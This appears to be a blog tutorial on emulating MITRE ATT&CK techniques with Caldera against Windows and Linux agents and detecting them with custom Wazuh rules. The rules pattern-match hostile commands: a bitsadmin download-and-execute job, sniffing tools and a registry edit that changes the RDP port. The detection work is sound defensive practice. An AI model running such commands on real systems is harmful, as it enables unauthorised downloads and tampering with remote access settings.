Adversary emulation with Caldera and Wazuh: Part 02

Wazuh - SIEM and XDR

• Remotely Upgrading Wazuh Agents – CLI Method
• Adversary emulation with Caldera and Wazuh: Part 02
• Ingesting OPNsense logs into Wazuh SIEM
• Wazuh: Detecting Web Attacks

Views: 21

Deploy Agents on Linux machines

2 Windows and 1 Linux agents

Configure sysmon

We configure the agent to capture Sysmon events by adding the following settings to the agent configuration file in "C:\Program Files (x86)\ossec-agent\ossec.conf"

<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>

Restart the Wazh agent after modifying the agent configuration file.

Detection using Wazuh

The attacks against the Linux agent are detected using the default out-of-the-box set of rules used for threat detection. 

We will write a custom rule to detect these techniques on the Windows agent. The following rules are added to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server.

<group name="windows">

  <rule id="180001" level="8" ignore="120">
    <if_group>windows</if_group>
    <match>bitsadmin.exe /transfer /Download /priority Foreground</match>
    <description>Suspicious download and execution with BITS job  on $(win.system.computer)</description>
    <mitre>
      <id>T1197</id>
    </mitre>
  </rule>

  <rule id="180002" level="8" ignore="120">
    <if_group>windows</if_group>
    <match type="pcre2">(?i)(tshark|wireshark)</match>
    <description>Network sniffing tool discovered on $(win.system.computer)</description>
    <mitre>
      <id>T1040</id>
    </mitre>
  </rule> 

  <rule id="180003" level="8" ignore="120">
    <if_group>windows</if_group>
    <field name="win.eventdata.commandline" type="pcre2" > reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\" /v PortNumber /t REG_DWORD *</field>
    <description>RDP port has been changed on $(win.system.computer)</description>
    <mitre>
      <id>T1021.001</id>
    </mitre>
  </rule>

</group>

Restart the Wazuh Manager after adding the above rules.

Setup adversary profiles with MITRE techniques

Linux endpoint

From the CALDERA server URL, navigate to the adversary section and create an adversary profile. For this blog post, we create an adversary profile named Linux-Adver-Profile. For easy identification of this profile, we add the description Linux MITRE techniques. 

After creating the profile, proceed to add the MITRE techniques using the Add Ability feature of CALDERA. 

Windows endpoint

We create an adversary profile named Windows-Adver-Profile. For easy identification of this profile, we add the description Windows MITRE techniques.

After creating the profile, we add the MITRE techniques using the Add Ability feature of CALDERA. We add the three techniques to be emulated and these can be seen in the image below. Click on Save Profile to save the abilities to the profile.

Run operations for the two adversarial profiles created

To run the attack against the endpoints, we follow these steps:

• Navigate to the operations section and create a new operation. 
• Add a new operation name and select either of the two adversary profiles. 
• Select Linux adversary profile for Linux endpoints, or Windows adversary profile for Windows endpoint.
• Click on start to run the attack, upon completion we click on stop to begin the cleanup process.

Windows Victims

Operation executed on Windows Agents:

Wazuh Detection

Linux Victim

Run the operation on Linux host

Wazuh Detection

Conclusion

We can use CALDERA to emulate known adversary behavior. We can detect those adversary activities by creating effective Detection Rules in Wazuh platform.